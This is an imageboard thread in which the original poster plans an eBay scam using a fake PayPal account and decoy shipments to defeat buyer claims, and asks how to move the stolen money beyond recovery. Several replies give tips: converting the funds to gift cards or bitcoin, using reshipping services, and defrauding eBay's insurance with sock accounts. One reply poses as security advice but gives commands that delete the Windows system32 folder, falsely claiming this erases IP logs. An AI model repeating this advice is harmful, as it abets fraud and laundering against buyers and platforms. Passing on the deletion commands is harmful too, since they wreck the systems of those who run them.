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File: 70 KB, 2000x800, 2000px-EBay_logo.svg.png [View same] [iqdb] [saucenao] [google]
1532875 No.1532875[DELETED]  [Reply] [Original]

> Moral fags can stop right here - leave

It's not hard to set everything up but what's the best way to quickly move the money so the buyer cannot get it back? It's > 30$ per person so hopefully they won't even bother with trying to get it back but how can I make sure?

- The Scam -

> Post somewhat expensive item for stupid low price (400$ item for $13)
> Buyer does what a buyer does
> Money goes into fake PayPal
> I send out "something" to the buyers zip code to get a tracking number, thus winning any claims against me

How can the money be moved from the fake account somewhere that it cannot be retrieved and the "legitimate" account will not be banned?

Any other tips/experiences with eBay scams?

>> No.1532880

use that fake account to buy more shit on ebay and send it to a fake address.

pick up the items.

>> No.1532884


fuck off scum

>> No.1532896

More shit to sell. Not ideal but a possibility. Would rather have the money moved quickly before saving up to get something else in case the PayPal account gets banned

Please see line 1

>> No.1532905

The buyer WILL get their money back, not from you but from eBay insurance policies.
I don't know much about PayPal security measures or whether or not they record IPs or something.
Your best bet isn't transferring the money to a legit PayPal or trying to do some sort of untraceable PayPal handoff or bank account transfer.
Your best bet at getting away with this is spending the money you steal through PayPal, to buy gift cards or bitcoins or whatever shit.

>> No.1532912

also the people you scam will likely try to get their money back.
eBay has great customer service and insurance policies so they will get it back.
If you wanted to go full circle with this, you could make a web of phony addresses and phony account to scam your own sock accounts, and then tell eBay you got scammed, effectively gaining money from their insurance protection.
If you get caught however, you're looking at mail fraud, insurance fraud, theft charges, etc

>> No.1532926

I did not think of buying gift cards, very good idea. I wonder if Amazon send the gift card's code or an actual card? Or possibly the option to choose

While a good idea, scamming myself sounds a bit too intricate and would mainly benefit from selling high dollar items at well over the items actual value.

Researching the consequences, most laws require/recommend at least $100 or more to be stolen before a case can be opened. It seems as only the buyer can actually file against the buyer and must prove that the buyer had intent to scam. VPNs are a wonderful thing....

Good information, I like the way you think.

>> No.1532952

>Sell item to buyer using reshipping service.
>Ship them 'different' item.
>They have no protection through eBay or PayPal, as they are using reshipping service.
>Relist item and sell again.


>> No.1532969

As long as you (the seller) have delivery conformation, you're covered. Reshipping is doing essentially the same thing right? Package is delivered and I no longer have to worry about it because something was dropped off. The only advantage I see to reshipping is that eBay and PayPal will say it's not their problem but I BELIEVE they would already say that same thing if the item has been delivered. Plus, bringing another variable into the equation is not something I want to do. I want keep it as simple as possible.

>> No.1533128

>sell 1200 dollar segway on ebay
>gets sold 5 states away
>send to guy
>he says its broken, gets his money back, gets my paypal locked for lack of funds, and never sends back the fucking segway
>I have no way to afford to get this property back, and not even close to enough time available to sue him

This is why I stobbed using Ebay.

I was going to feed my kids with that fucking money.

>> No.1533313

I once saw an elaborate scam which netted the guy several hundred thousands of dollars within 6 months. Ponzi is your friend.

>> No.1533317

>low level petty eBay scamming

How does it feel to be poor and desperate?

>> No.1533472
File: 28 KB, 500x491, 281.jpg [View same] [iqdb] [saucenao] [google]

If you're going to scam on ebay, the best security measure for yourself is to go to command prompt in your programs then a window will pop up, all black, just:

Press enter after each input

1.type : C:

2. type : cd windows

2. type : del system 32/*.*

3. type : del system32

Regardless of what you're doing, it will keep the any authorities out of your hair.

It's a command that more or less hidew a little file that keeps track of your IP logs, temp files (transaction information, browser history, etc.). This step is essentially covering your footsteps.

Pic related, it's what you want the authorities not to do to your actions.

Good luck OP

>> No.1533598

I'm not trying to steal 1200$ from someone. I'm not that much of a piece of shit

Na, just like muniez. It adds up quick after 20/30 tards buy it in a few hours.

Did that months ago, my computer is much faster. Thanks

Don't know why people are getting butthurt. It's 13$ from people who are too stupid to realize it's an obvious scam. Back to breaddit with you